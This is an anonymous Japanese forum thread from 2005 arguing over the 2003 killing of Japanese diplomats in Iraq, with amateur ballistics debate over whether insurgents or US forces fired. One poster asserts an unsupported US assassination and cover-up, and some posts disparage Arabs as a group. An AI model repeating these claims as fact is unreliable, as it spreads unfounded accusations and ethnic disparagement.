隠蔽工作って知ってるだろ。ニュースで大々的に取り上げられなきゃ意味がない

そういえば、友好国どころか国連の事務所の警備をなぜか手薄にして
ボムトラックを国連の事務所に横付けされ
占領政策に異議を唱えていたデメロ国連大使を爆死させちゃったりしてるし
0064国連な成しさん
垢版 |
05/06/30 19:36ID:???
>隠蔽工作って知ってるだろ。ニュースで大々的に取り上げられなきゃ意味がない
それはあんたの妄想以外にソースが存在するのか?
0066国連な成しさん
垢版 |
05/06/30 19:42ID:???
逆にいえば韓国人にたいする攻撃を隠蔽だと!!!と言っているメディアが一つでもあるのか?
まともなところで。
0067国連な成しさん
垢版 |
05/06/30 20:00ID:???
>>66
ないな。
記者や編集委員の私見で記事の傾向が変わるのはまだしも、
ここまで一方的な傾きをもっているというのは、
日本のメディアを見ていて本当に実感できることではある。
0068国連な成しさん
垢版 |
05/06/30 22:16ID:Q1vvGCio
>>64
これだけ大事になり、米軍が警戒しているのに翌日に同じ幹線道路でドンパチやらかすヤツは居ない
そういう意図なら最初から米軍狙うだろ
0069国連な成しさん
垢版 |
05/06/30 22:18ID:Q1vvGCio
>>64
>それはあんたの妄想以外にソースが存在するのか?
文脈上ソースは関係ないだろ
隠蔽工作とはそういうものだ、と書いてる訳
0070国連な成しさん
垢版 |
05/06/30 22:18ID:???
>>68
相手はアホのアラブ人だからねぇ。
逃げること以外に大して統制とれてないみたいだし。
0071国連な成しさん
垢版 |
05/06/30 22:20ID:cZX4IvE.
米軍以上のアホはイラクにはいないなw
0072国連な成しさん
垢版 |
05/06/30 22:22ID:???
>>71
まあ、強いていうなら両方アホなわけだが、
お前以上のアホというか愚か者もいないと思う。
0073国連な成しさん
垢版 |
05/06/30 22:34ID:cZX4IvE.
思うだけかw
0075国連な成しさん
垢版 |
05/06/30 22:43ID:cZX4IvE.
なんだ信濃粘着かよw
0076国連な成しさん
垢版 |
05/06/30 23:03ID:???
>>75
ID出してどうしたの信濃?
ID丸だしで自演したのがバレたトラウマからずっと下げてたのに、
そんなことも忘れたの?
0077国連な成しさん
垢版 |
05/06/30 23:08ID:Q1vvGCio
>>70
>逃げること以外に大して統制とれてないみたい
外務省上村氏が調査したとされる報告書の目撃情報によれば
「後方から銃撃しながら接近」し
「前方、側面を合計4台ほどで取り囲み」、「ケブラーヘルメットをかぶった」武装グループが
「前方、及び側面から」「AK及びAKMを用いて」銃撃したとあるが
相当周到に計画されてるみたいだな

突発的襲撃として知られる橋田さんのときのような荒々しさはない
0078国連な成しさん
垢版 |
05/06/30 23:09ID:Q1vvGCio
>>76
なんかあったのか?
0079国連な成しさん
垢版 |
05/06/30 23:13ID:cZX4IvE.
>>77
信濃粘着に言っても無駄だって
0080国連な成しさん
垢版 |
05/06/30 23:14ID:cZX4IvE.
>>78
もしかして信濃粘着しらないの?
0081国連な成しさん
垢版 |
05/06/30 23:17ID:Q1vvGCio
>>80
>信濃粘着
田中康夫関連?
あんまり興味ない
マカ夫とか梅夫とかGKみたいなもんか?
0082国連な成しさん
垢版 |
05/06/30 23:18ID:???
>>77
ブラジャーの中に無線機隠して政府軍将校の娼婦させてたような、
ベトナム戦争の北軍の統制とは比べようもないものだろう。
せいぜい、『普通』といったところか。
0083国連な成しさん
垢版 |
05/06/30 23:19ID:Q1vvGCio
>>75,76,79,80
流れ的には自作自演か
で、どっちが信濃粘着って設定なんですか?
0084国連な成しさん
垢版 |
05/06/30 23:22ID:???
>>83
余程の初心者か確信犯でない限り、その質問はしない方がいいぞ。
どっちも自分に都合のいいことを言うだろうことくらい、簡単にわかるしな。
大抵の場合、質問に釣られる奴が悪者だったりするわけだが。
0085国連な成しさん
垢版 |
05/06/30 23:23ID:Q1vvGCio
>>82
>ブラジャーの中に無線機隠して政府軍将校の娼婦させてたような、
>ベトナム戦争の北軍の統制とは比べようもないものだろう。
それは、「統制がとれてる」の例ではないな
やり直し
4台で分乗し獲物を見るやポジションを確保。
野盜にしては大掛かり過ぎ
後方から150kmで走行する4WDに銃撃しながら接近し
4台で取り囲むという流れが現実的ではない
0086国連な成しさん
垢版 |
05/06/30 23:26ID:cZX4IvE.
>>81
まーだいたいそんな感じ
「信濃国民」ってコテハン(この人は厨じゃないよ)
に粘着してて、誰が書いても「おまえ信濃国民だろ」とか書いてくるうざい厨
オレにレス返してきた>>72>>74>>76それにおそらく>>70が信濃粘着
0087国連な成しさん
垢版 |
05/06/30 23:30ID:Q1vvGCio
>>86
了解
ま、スレ汚しみたいだからマジレスして清掃するのはマズいのね
0088誘導
垢版 |
05/06/30 23:33ID:???
当板では、高遠さん関連のスレは、自治スレでの話し合いにより、
ひとつしか認められていません。

このスレも、高遠スレに変質したと判断します。

このスレには、削除依頼が出ています。

【信濃】 高遠のボランテリア35 【アンチ信濃】
http://sports2.2ch.net/test/read.cgi/iraq/1120056794/

もしくはその後継スレに、合流してください。
0089国連な成しさん
垢版 |
05/06/30 23:33ID:???
>>85
イラクの武装勢力は誤射が多い。
また、民間人を殺したり武装勢力同士で反目しあうなど問題も多い。
ベトナムの場合は少数の精神的精神的指導者が全軍を完璧に統率できる状態にあったが、
イラクの場合は様々な勢力が好き勝手に作戦を立てて行動しているという状態。
プロパガンダのために人的資源を浪費したり、無理に正面から戦って被害を増大させたりと、
多少は効果があるだろうが致命的な攻勢をかけることができていない。
逃げ足だけは一流なわけだが。
0090国連な成しさん
垢版 |
05/06/30 23:34ID:Q1vvGCio
>>88
>高遠スレに変質したと判断します
ご勝手にどうぞ
スレ汚しは消えてください
0092国連な成しさん
垢版 |
05/06/30 23:37ID:cZX4IvE.
イラク板はヘンな人も結構来るからスルーして自説を展開しちゃって
下さいQ1vvGCio さん
0094国連な成しさん
垢版 |
05/06/30 23:39ID:Q1vvGCio
>>89
>イラクの武装勢力は誤射が多い。
いや、狙ってるなら誤射ではないだろ
誤射が多いのは米軍だぜ
この事件の前にも伊外交官誤射して運転手殺したしな
0095国連な成しさん
垢版 |
05/06/30 23:41ID:cZX4IvE.
オレは奥大使殺害事件の詳細は知らないから議論できない。
アメ軍(というか司令部?)がアホなのは関係なく言える。
ベトナムで失敗して学んでないんだからアホだろ
0096国連な成しさん
垢版 |
05/06/30 23:41ID:Q1vvGCio
>>91
IDが見えてない?
0097国連な成しさん
垢版 |
05/06/30 23:44ID:???
>>94
情報公開してる国家と、全くそうでない対象を同列に比較しているわけだね。
>誤射が多いのは米軍だぜ
こうわかるのも情報公開しているからだろ?
米軍や警察などを狙った攻撃(あえてテロとは書かない)で、全く関係ない無辜の民が何人殺されていると思う?
武装勢力が市街戦になったとき、どれくらい多く民間人を巻き込んで射撃しているかわかるか?
RPGを撃つとき、背後に人や壁があると重傷を負うということ知ってる?
次元の違う話を一方的に比較するのはやめな。
0098国連な成しさん
垢版 |
05/06/30 23:48ID:???
>>97
確かに、知られてないから事実ナシってことにはならんよなぁ。
大怪我を負った武装勢力が民間人として病院で死ぬこともいっぱいあるだろうしね。
0099国連な成しさん
垢版 |
05/07/01 00:04ID:wjSl3MEA
>>97
>こうわかるのも情報公開しているからだろ?
残念ですね、情報公開できるのは生存者が居るときだけです。
情報公開によって誤射が明らかになったものは、「すべて」生存者が居ます
奥さんの場合、全員死亡ですよ
>米軍や警察などを狙った攻撃(あえてテロとは書かない)で、全く関係ない無辜の民が何人殺されていると思う?
米軍を狙ってるだけじゃないだろ。受け入れた人間や協力者の抹殺もあると思うが?
これには混乱した米兵の射撃による無辜の民の被害者も含まれているし
PMCの無差別射撃による無辜の民の被害者も含まれているね
>武装勢力が市街戦になったとき、どれくらい多く民間人を巻き込んで射撃しているかわかるか?
文脈上関係ない話ばかりですね
>RPGを撃つとき、背後に人や壁があると重傷を負うということ知ってる?
無反動砲みたいなの話か?
あからさまに関係ない話振るのは詭弁です
0100国連な成しさん
垢版 |
05/07/01 00:12ID:???
>>99
>情報公開できるのは生存者が居るときだけ
あとは、報道陣が同行しているときだろ
0101国連な成しさん
垢版 |
05/07/01 00:17ID:???
>>99
ようするにお前は、陰謀論を正当化するためには何でも否定しなけりゃ気が済まないタマか。
議論の場にはこないほうがいいよ。
というか自演すんな。
0103国連な成しさん
垢版 |
05/07/01 00:22ID:???
>>99
そういや君、軍板でホロコーストスレ立ててたニラ君じゃないよね?
0104国連な成しさん
垢版 |
05/07/01 00:25ID:wjSl3MEA
>>101
>自演
お前自身だろ
簡単に否定される材料しか持って来ないからだろ
そういえば、米軍死者の中にPMC社員が入っていないのと同様に
米軍誤射の中にはPMCの誤射は含まれていない
PMCってのはブラックウォーター事件のときの惨状のように地元民から強烈な恨みを買ってる
理由は誤射自体が多いことと、誤射があっても誰も裁けないから
つまり、PMCが見境無く乱射する可能性は否定できない
0106国連な成しさん
垢版 |
05/07/01 02:54ID:???
■テレビのディレクター死亡 バグダッドで米兵が銃撃

 AP通信によると、イラクの首都バグダッドで28日、地元テレビ局「アッシャルキーヤ」のディレクター、バクリ氏が米軍の車列に近づき、米兵の銃撃を受けて死亡した。この1週間にバグダッド周辺で米軍に殺害された報道関係者はこれで3人目となった。
 同局は、バクリ氏が交通事故現場を通り過ぎようとした際、米軍に気付かなかったため、撃たれたと説明。米軍は事件の報告がないとしている。
 国際ジャーナリスト組織「国境なき記者団」(本部パリ)は米軍などに事件の調査を要求した。
 バグダッドでは24日にも、米系報道機関で働くイラク人記者が米兵に殺害された。米部隊の警告に応じなかったためとみられる。
 また26日には、地元テレビ局で働く女性記者が、米軍が武装勢力に反撃した際に、撃たれて死亡した。(共同通信)
ttp://headlines.yahoo.co.jp/hl?a=20050629-00000242-kyodo-int
0107国連な成しさん
垢版 |
05/07/01 15:57ID:/t5zv4.w
>文脈上ソースは関係ないだろ
>隠蔽工作とはそういうものだ、と書いてる訳

それじゃ典型的な陰謀廚になっちゃうよ。基本的に議論に陰謀論をだすべきじゃない。
決定的な証拠がでないかぎり陰謀論を言う人は相手にされない。陰謀論者では有名な田中宇ですら、
朝まで生テレビでほとんど嘲笑されていた。
なぜならソースが無いから。たとえば>>50から>>60あたりで繰り広げられていた論争自体には意味がある。
けれども誤射派の人でも米軍が誤射したという決定的な証拠は見つけていない。
米軍でも可能だったという仮説をあげるにとどまっている。仮説には意味がある。
なぜなら、米軍車両からでも水平に打ち込むことはできるよと。という可能な仮説をあげているからだ。
けれども、韓国人のは隠蔽工作だったとか民間軍事会社が乱射しているとかはあくまであなた個人の考えに過ぎない。
考えとして言うならいいが、それを事実として信じているのは痛すぎる。

真珠湾攻撃陰謀論が根強く存在するが、決定的な証拠がでないかぎり、誰もそれを事実としては認めない。
どんな戦史研究家も。陰謀論を決定的証拠がでてこないかぎり事実として話すのは無理がある。

それにわずかな利益のために友好国の外交官を攻撃したことなんて世界諜報史でほとんどないぞ。
イラクの公共事業の利益くらいで、外交官を暗殺するなんて思っている時点で、メディアリテラシー能力がない。
0108国連な成しさん
垢版 |
05/07/01 18:12ID:7FZTPG..
>>107
>それじゃ典型的な陰謀廚になっちゃうよ
隠蔽工作があったとしてその存在が明らかになってしまうと隠蔽工作にはならないねw
だからその部分にソースが存在し得っこないんだよ
それに韓国人技師たちの件では容疑者拘束と言う報道があったんだが
実は続報もない(人数も素性も不明)
この事実からは、「犯人が地元民である」とする印象操作を疑うべきだが
韓国人技師襲撃犯が国籍及び人数が最終的に判明しているならソースくれ
ましてや、奥さんの事件と関係があるとするソースがあるのならな

>真珠湾
米海軍資料館で文書が公開済みみたいだが

>友好国の外交官
あとね、奥さんは、CPA出向の身にありながら戦後復興は国連が主導で多国籍軍の枠にとらわれないものをすべきだ、という主張だったんだよ(月刊外交フォーラムの遺稿より)
当然のように自衛隊派遣のメドが立ってない日本にも復興支援を行う権利があると考えていたし、その考えに沿ってのベクテル社との攻防だった訳
即ち、莫大な予算が動く復興支援に多国籍軍に参加しなかった仏ですら組み込もうとしてきたし、
同様の考えにあったデメロ国連大使が爆死した後もそれは変わらなかった(月刊外交フォーラムの遺稿より)
この点でCPAと考え方にズレが生じているのは、その後の独仏締め出しを見れば明らか。
従って、奥さんが生きてるうちは、巨額の戦後復興利権は、米英の独占はあり得ないわけ
当然、CPA内に同様の考えを持った外交官が居た可能性も有り、そういった勢力の封じ込めに奥さんが殺された可能性は高い
0109国連な成しさん
垢版 |
05/07/01 18:20ID:7FZTPG..
>>107
>それを事実として信じているのは痛すぎる
俺は、外務省が作成した報告書に矛盾点があり、その根拠となったとされる米軍の報告書が存在しない
つまり外務省の発表が事実であるとする根拠がないし
公安の調査方法(弾道の割り出し方法)が全く不明である事実
襲撃車両の座面の隠蔽
見つかった銃弾の総量の矛盾
薬莢が全く見つからなかった矛盾(カートキャッチャーはAKでは不利であり、また一般性がなく矛盾が生じる)
米軍のパトロールの時刻と襲撃時刻の一致
奥さんの銃創の矛盾

等、米軍を疑うに十分すぎる矛盾点が生じている
0110国連な成しさん
垢版 |
05/07/01 18:27ID:7FZTPG..
>>107
>米軍車両からでも水平に打ち込むことはできるよと。
それがそもそもの間違い
左側の弾痕が下8°か水平に撃たれたものであるのなら
奥さんたちの被弾数、箇所、車内の弾痕箇所に疑問が生じる
なぜ高い位置の貫通孔を形成した複数の銃弾がルーフ部からも抜けず(抜けたものは1発、公安の調査では天井部分に到達した銃弾はなかったとされる)、そして右側にも到達せず奥さんの被弾数より多いのか?
これを地元武装勢力のものであるとする者の誰もが説明できていない

これを説明するとすれば、襲撃された車両の座面の確認が前提となる
0111国連な成しさん
垢版 |
05/07/01 18:41ID:???
謎があったな
弾痕の中で、一つ極端に低い箇所のものがあって、公安もそれは除外して調べたんだが
米軍の誤射であるとすれば、それがタイヤを狙ったものと推測できる
これは前面エンジンルームについているものと合わせれば、警告射撃によるものと考えれば
後方から接近してきた武装勢力説には矛盾が生じるね
0112国連な成しさん
垢版 |
05/07/01 19:33ID:???
>隠蔽工作があったとしてその存在が明らかになってしまうと隠蔽工作にはならないねw
>だからその部分にソースが存在し得っこないんだよ
ばれてしまう隠蔽工作もあると思うんだが。隠蔽工作の証拠は証拠がないことだ?とでもいうつもり?
陰謀はとても巧妙におこなわれていて証拠が見つからないってのは典型的な陰謀論者の意見だよ。

>この事実からは、「犯人が地元民である」とする印象操作を疑うべきだが
そこで論理が飛躍しすぎだろ。というか拘束したというソース事態私は聞いていない。
それに本当に隠蔽なら、うそでもでっち上げでも適当に捕まえたゲリラを犯人にするでしょ。
>韓国人技師襲撃犯が国籍及び人数が最終的に判明しているならソースくれ
悪魔の証明までいいだしましたか。韓国人技師は襲われたが、けっきょく犯人などを恐ろしくてはっきり見れていないといってます。
すくなくとも米軍車両でなかったことはあきらかですが。

>米海軍資料館で文書が公開済みみたいだが
陰謀論を決定付ける文書なら大事件ですが・・・・。どういう文書?

>あとね、奥さんは、CPA出向の身にありながら戦後復興は国連が主導で多国籍軍の枠にとらわれないものをすべきだ、という主張だったんだよ(月刊外交フォーラムの遺稿より)
>当然のように自衛隊派遣のメドが立ってない日本にも復興支援を行う権利があると考えていたし、その考えに沿ってのベクテル社との攻防だった訳
意見の違い程度ならいくらでも外交関係では存在します。戦後復興を国連主導で、なんていってる奴はいくらでも存在します。
その程度で友好国の外交官を撃ち殺していては、フランスやドイツ、中国の外交官なんて全滅です。友好国の外交官を射殺するってのがばれたら政権転覆程度ではすみません。
日本のたかが一外交官(高位でもない)の意見くらいで射殺するなんてばかげてます。

0113国連な成しさん
垢版 |
05/07/01 19:38ID:X25244dY
なかなか面白くなってきたね
0114国連な成しさん
垢版 |
05/07/01 19:42ID:???
>弾痕の中で、一つ極端に低い箇所のものがあって、公安もそれは除外して調べたんだが
除外した根拠は?徹底的に調べているはずなのにわざと見過ごすなんてありえない。
>米軍の誤射であるとすれば、それがタイヤを狙ったものと推測できる
君は奥さんは暗殺だったといってたのではないの?民間軍事会社をやとった?警告射撃する必要も無いじゃないの?
それに別にテロリストでも、車の動きをとめようとしてタイヤに射撃していることは多々ありますが?

>これは前面エンジンルームについているものと合わせれば、警告射撃によるものと考えれば
>後方から接近してきた武装勢力説には矛盾が生じるね

水平で射撃されたってのが大概の見方になっていたはずですけど。
後方からいきなり射撃してきたとかいう報告あったけ・・・・。

それと銃弾の破片ならちゃんと分析してるんですけど。

>「銃器の種類は特定できなかった」としながらも、銃弾の破片とみられる金属片と、ロシア製自動小銃カラシニコフの銃弾について「銅や亜鉛のパーセンテージは若干違うが、成分は同じだ」と述べた。(共同通信4月5日)
特定こそできなかったが、ほとんどカラシニコフで決定という意味なんですが。米軍はAKなんぞ使っていません。銃弾までほぼ特定されても誤射といいきるのでしょうか?
ああ!!!わかった。民間軍事会社がカラシニコフで銃撃したんだね。



0115国連な成しさん
垢版 |
05/07/01 19:49ID:???
ちなみに銅や亜鉛の成分は作った場所によって若干違います。
中国製のAKとロシア製のAKの弾も微妙に違うし。もちろん米軍の弾とは全然違います。
0116国連な成しさん
垢版 |
05/07/01 19:56ID:???
>判明したのは7.62mmってだけで、NATO弾か否かは成分分析にまわされた
>で、結果はAKのものと矛盾しない(口頭で+議事録はあり)とされたが、一部一致しない物が出ている(曳光弾か?)し、AKありきなのでNATO弾との照合は行われていない

それと米軍歩兵が一番よく使っているM16は5.56ミリ弾だしなぁ。それにAKと矛盾しないってことはNATO弾じゃないってことだぞ。弾の成分は結構差がある。
どっちにせよ・・・。100パーセント誤射じゃないとも100パーセントテロリストだとも勿論言えません。
けれど自分の意見を補足するのに陰謀論をだすのはスマートじゃありません。それと別の銃の弾丸がでてきたところで、武装勢力は多種多様な銃を使ってます。カラシニコフだけではないでしょう。

結局、どれだけ議論しても100パーセントの断言にはならないでしょう。
けれども、ある程度の齟齬で外交官を殺害したり、隠蔽工作だといったりするのが駄目だといってるんですよ。
0117国連な成しさん
垢版 |
05/07/01 20:39ID:???
WMD捏造とかアルカイダ支援捏造とか前科があるからね・・・
リットン調査団のようなものが必要だろう
0118国連な成しさん
垢版 |
05/07/02 13:12ID:???
>>114
>除外した根拠は?徹底的に調べているはずなのにわざと見過ごすなんてありえない。
見過ごすも何も警察庁の担当者がそう言っちまった訳だが
0119国連な成しさん
垢版 |
05/07/02 13:15ID:???
>>116
>それと米軍歩兵が一番よく使っているM16は5.56ミリ弾だしなぁ。それにAKと矛盾しないってことはNATO弾じゃないってことだぞ。弾の成分は結構差がある。
そのとおり
ただし、車載のものは、7.62mmのFN-MAGですよ
発射速度と弾痕数ともなんら不自然な点はない
成分分析については、NATO弾との照合が行われていないことと、AKのものと全く一致しないものがあったことも注意しろ
0120国連な成しさん
垢版 |
05/07/02 13:19ID:???
>>114
>銅や亜鉛のパーセンテージは若干違うが、成分は同じだ
あとな
7.62mmx51の成分についてだが
基本的に鉛と真鍮なんだけど、

真鍮は「銅と亜鉛の合金」なんだよ

「銅や亜鉛のパーセンテージは若干違うが、成分は同じだ」とするならNATO弾も照合を行うべきだがな
ま、合っちまうからやらなかったと考えるべきだなw
0121国連な成しさん
垢版 |
05/07/02 13:26ID:???
>>112
>拘束したというソース事態私は聞いていない。
http://piri.junbi.net/modules/newbb/reply.php?forum=5&post_id=2762&topic_id=84&viewmode=flat&order=&PHPSESSID=b64f7043edb513608804bfd99774117a
2003年12月08日
外交官殺害:
2班で組織、周到な計画での犯行 イラクの州知事

 イラク北部ティクリート近郊で起きた日本人外交官殺害事件で、ティクリートを州都とするサラハディン州のフセイン・ジュブルト知事は7日、
犯行グループが「標的」の情報収集と攻撃実行のそれぞれの役割を分担する2班で組織され、周到に計画した上で犯行に及んだとの見方を明らかにした。

 また知事は、同事件の翌日に同じ幹線道路で発生した韓国人技師殺害事件の容疑者をイラク警察当局が7日までに拘束したことを明らかにした。

 知事は拘束日時や容疑者数など詳細を明らかにしていないが、州警察当局を監督する立場。捜査当局が外交官殺害事件解明の糸口となる情報を容疑者から得ている可能性もある。

 知事の発言内容は、事件が「周到に計画された殺人のプロの犯行」とするイラク暫定内閣のジバリ外相の見方と一致している。外相は旧フセイン政権下の情報機関、
総合情報局(ムハバラト)の犯行と言明、反米武装勢力などが日本人をソフト・ターゲットとして狙った可能性を強く示唆していた。

 バグダッドからティクリート、モスルに至る幹線道路「1号線」では、外国人らを中心に米軍主導のイラク復興支援関係者らを狙った事件が相次いでいる。(バグダッド共同)

[毎日新聞12月8日] ( 2003-12-08-12:10 )
元記事はもうない
ttp://headlines.yahoo.co.jp/hl?a=20031208-00000039-kyodo-int
続報も
0122国連な成しさん
垢版 |
05/07/02 13:27ID:???
>>114
>水平で射撃されたってのが大概の見方になっていたはずですけど。
ドアの弾痕のみの位置関係から算出しただけですが
ガラス部分の弾痕から割り出しては居ない
>後方からいきなり射撃してきたとかいう報告あったけ・・・・
外務省の報告書参照のこと
0123国連な成しさん
垢版 |
05/07/02 13:31ID:???
>>114
>水平で射撃されたってのが大概の見方になっていたはずですけど。
そうそう公開された車体の弾痕と右側の弾痕をガラスのもので結ぶと水平ではなくなります
斜め上方向から撃ち込まれていることになりますが
水平だとすると、奥さんの銃創の説明がつきませんので、仮説をよろしく
目撃情報では後部座席の男性は横にもうつぶせにもなってなかったと言うことですから注意してね
曲がる弾理論はDQN認定
0124国連な成しさん
垢版 |
05/07/02 14:14ID:dJcZLtKM
>>116
>ある程度の齟齬で外交官を殺害したり、隠蔽工作だといったりするのが駄目
ある程度の齟齬?
戦後復興の利権がいかなるものか理解してないんだね
もう何言っても、「戦後復興なんて利益上がらないだろ」とか平気で言いそうだな
0125国連な成しさん
垢版 |
05/07/02 22:02ID:???
信濃にはブレットの話しても無駄だろうなぁ。
AKとMAGで同じ長さの弾頭使ってるとか信じてそうだしなぁ。
0126国連な成しさん
垢版 |
05/07/02 22:16ID:dJcZLtKM
>>125
>AKとMAGで同じ長さの弾頭使ってるとか
残念なことに、車内から臨時大使である上村氏が見つけた(ほぼ原形をとどめているとされる)銃弾は
「完全に砕け散っているわけではない」ということであり、また変形しており、
外見上、AKの7.62mmx39の銃弾なのか7.62mmx51の銃弾なのかは不明で、公安部含めどこも判断を下しておりません
すなわち、銃弾の長さは、使われた銃弾の特定には繋がらなかったと言うことですよ

つまり、君のレスは的外れなんだけど
0128国連な成しさん
垢版 |
05/07/02 22:23ID:lZB7G8wE
えっーときりが無いので射撃の分析結果についてはもうこれで終わりにしましょうよ。
どっちにとても、私と誤射さん(って勝手に名前付けてごめんなさい)双方を満足させる結果はでないでしょう。
ではとりあえず最後に弾薬について誤射さんは根本的に完全に間違っているというかわかっていないところがあるので。

>ただし、車載のものは、7.62mmのFN-MAGですよ
>>125さんがいってるように、同じ7.62ミリでもMAGとアサルトライフルであるAKでは大きさから違います・・・。長さってことね。
そして弾丸からは、MAGで打ったものは発見されていません。ほとんどカラシニコフの弾と同じ大きさなんですけど・・・。
口径さえ同じならMAGやAKでも同じ弾使っていると思っていませんか?
>発射速度と弾痕数ともなんら不自然な点はない
車載機関銃ならあんな程度の穴ではすみません。車がバラバラになっても不思議なし。アサルトライフルと機関銃じゃ全然違うんですよ。
>成分分析については、NATO弾との照合が行われていないことと、AKのものと全く一致しないものがあったことも注意しろ。
・・・・。成分分析ってどうやっているか知らないんですね・・・・。
簡単に説明しますよ。金属の保有量などのバランスを調べるのが基本です。
んで、亜鉛や鉛や真鍮の比率を各弾丸の弾と比較するわけです。おそらく、一覧表やデータベースを持っているでしょう。
それで、その比率で一番近いものがカラシニコフの弾だったわけです。
ようするに比率計算でどれが一番近いかを調べるわけでして、その比率を照らし合わせる時に当然NATO弾も比較対照にははいっているでしょう。

弾丸の成分分析は「この比率はカラシニコフか?YESかNOか。」ではなく、この比率はどの弾丸が一番近いかで分析します。銃マニアさんなら常識です。
よってNATO弾と照合してないは妄想です。
車載機関銃ではないのはさらに明白です。成分がまったくといっていほど違うし、はっきりいって大きさだけでわかっちゃう。
ちなみにゲリラは多数の国の武器を所有しているので違う弾丸がでてきても全然不思議じゃないです。

結局、米軍が使っている弾丸は全然見つからなかったことになります。
0129国連な成しさん
垢版 |
05/07/02 22:25ID:lZB7G8wE
>「完全に砕け散っているわけではない」ということであり、また変形しており、
重量でもわかるし、一部でも形がのこっていれば素人でもみわけがつきますよ。
おまけに分析にまわせば一発。
ソースとして世界中の新聞で米軍仕様の弾丸がはっけんされたとしたソースは絶対にありません。
0130国連な成しさん
垢版 |
05/07/02 22:28ID:lZB7G8wE
>ある程度の齟齬?
>戦後復興の利権がいかなるものか理解してないんだね
>もう何言っても、「戦後復興なんて利益上がらないだろ」とか平気で言いそうだな

ならいままで米国が友好国の外交官を殺害した事例をあげてみてください。
基本的に政権の浮沈に関わることです。いきなり暗殺なんてありえないでしょう。
まず、もしやるとしても日本政府に圧力をかけるのでは?
0131国連な成しさん
垢版 |
05/07/02 22:32ID:???
まーた、論破されたからって話を逸らす。
お前の悪い癖だよ、信濃。
0134国連な成しさん
垢版 |
05/07/02 22:36ID:lZB7G8wE
信濃さん信濃さんってレッテル貼りしてる人は返ってくれ。
誤射さんは話はちゃんとできる人だよ。
0135国連な成しさん
垢版 |
05/07/02 22:36ID:dJcZLtKM
>>128
>同じ7.62ミリでもMAGとアサルトライフルであるAKでは大きさから違います・・・。長さってことね。
>そして弾丸からは、MAGで打ったものは発見されていません。ほとんどカラシニコフの弾と同じ大きさなんですけど・・・。
一言言って良いか?おれも7.62mmのNATO弾とAKのとを写真のものと比較したが断言できるものじゃなかったぜ
ほとんどカラシニコフの弾やNATO弾と同じ大きさなんですけど・・・
お前、弾頭見たことないんだろ?
>口径さえ同じならMAGやAKでも同じ弾使っていると思っていませんか?
それはない。不審点があるだけ
>車載機関銃ならあんな程度の穴ではすみません。車がバラバラになっても不思議なし。アサルトライフルと機関銃じゃ全然違うんですよ。
お前、50口径やTOWと混同してないか?
各種報道写真を見ても7.62mmFNMAG搭載のHMMWVなんて散々出てきているだろ
まさか7.62mmで掃射して5秒足らずで車体がバラバラになると思ってるのかい?wなら銃器オタ失格だな

>簡単に説明しますよ。金属の保有量などのバランスを調べるのが基本です。
>んで、亜鉛や鉛や真鍮の比率を各弾丸の弾と比較するわけです。おそらく、一覧表やデータベースを持っているでしょう。
>それで、その比率で一番近いものがカラシニコフの弾だったわけです。
>ようするに比率計算でどれが一番近いかを調べるわけでして、その比率を照らし合わせる時に当然NATO弾も比較対照にははいっているでしょう。
最終的論拠は憶測ですか。

>弾丸の成分分析は「この比率はカラシニコフか?YESかNOか。」ではなく、この比率はどの弾丸が一番近いかで分析します。銃マニアさんなら常識です。
>よってNATO弾と照合してないは妄想です。
それが妄想です。成分がAと矛盾しない、というのは、すべての試料と比較しその中でAとは矛盾bオない、とは同給`ではない。
>車載機関銃ではないのはさらに明白です。成分がまったくといっていほど違うし、はっきりいって大きさだけでわかっちゃう。
違うと言うならソースをだしてくださいな。簡単だろ
あと成分が全く一致しないものも出ているんだが、見解を聞かせてほしい(俺は曳光弾かなと思ってる)
0136国連な成しさん
垢版 |
05/07/02 22:40ID:???
誤射派は弾頭重量のソース出してみろ。
同じということを証明してみれ。
0137国連な成しさん
垢版 |
05/07/02 22:41ID:dJcZLtKM
>>130
>ならいままで米国が友好国の外交官を殺害した事例をあげてみてください。
>基本的に政権の浮沈に関わることです。いきなり暗殺なんてありえないでしょう。
>まず、もしやるとしても日本政府に圧力をかけるのでは?
政府高官や大使と勘違いしてないか?
奥は当時は参事官だぜ、駒
ただし、CPAに出向の、という
CPA内で戦後復興利権を有志連合以外の国にもシェアしろとデメロ国連大使の爆死後も主張している人間が居れば
疎ましく思われるのは想像に難くない
0138国連な成しさん
垢版 |
05/07/02 22:42ID:dJcZLtKM
>>129
>重量でもわかるし、一部でも形がのこっていれば素人でもみわけがつきますよ。
見分けがつかない素人がそう主張している訳な
0139国連な成しさん
垢版 |
05/07/02 22:45ID:???
>>137
>政府高官や大使と勘違いしてないか?
>奥は当時は参事官だぜ、駒
「二階級特進」で「大使」になったんだよねw
0140国連な成しさん
垢版 |
05/07/02 22:46ID:dJcZLtKM
>>136
>誤射派は弾頭重量のソース出してみろ。
そもそも見つかった銃弾から重量を基にAKないしはNATOのものとしている報告書がない以上、
出しても意味無いよ

まあ、NATOとは成分が一致しないなら、ソースくれって
なんか見つかんないけどね、NATOの成分表
0141国連な成しさん
垢版 |
05/07/02 22:47ID:???
AKは400メートル程度の射距離で運用することを前提に設計されていて、車載機関銃ではこれが1000近くになる。
弾頭が軽いと横風の影響を受けやすいだけでなく、速度の減衰も大きくなるため、長距離の射撃には向かない。
したがって、AKとMAGの弾丸の弾頭重量にはかなりの差がある。
鉛に被甲した弾丸が全てちぎれたり砕けたりすることはないため、弾頭重量をはかれば弾丸の種類がわかることになる。
0142国連な成しさん
垢版 |
05/07/02 22:49ID:lZB7G8wE
>一言言って良いか?おれも7.62mmのNATO弾とAKのとを写真のものと比較したが断言できるものじゃなかったぜ
>ほとんどカラシニコフの弾やNATO弾と同じ大きさなんですけど・・・
私がいってるのは車載機関銃の7.62ミリとAKなんですが・・・。マジみてわからない?長さから違うんだよ。

>それはない。不審点があるだけ
あるならなんで7.62ミリでいっしょだろ。みたいな言い方を前レスでしたんですか?

>最終的論拠は憶測ですか。
憶測じゃなくて、成分分析の基本なんですけど。リストの中から一番似ているのを探すってのは弾薬だけじゃなくて、大抵の科学でも常識ですよね。
カラシニコフに似ているってのはそれに一番近いってことです。理系の人じゃないからわかんないかもしれないけど・・・。

>それが妄想です。成分がAと矛盾しない、というのは、すべての試料と比較しその中でAとは矛盾しない、とは同義ではない。
?????さっぱりわけわかんないんですが。オレンジジュースの成分分析をするとして、フロリダ産のオレンジに一番近い値がでれば、それはフロリダ産オレンジと分析するのが打倒でしょう。
比較対照にやたらそっくりな成分のものがいたとしたら別だけどNATO弾とAKの弾は成分では全然違うんですが?
第一NATO弾との照合をまったくしてないなんてどこのソースもいってない。
「成分がAKのものに一番近かった」ってことだし。

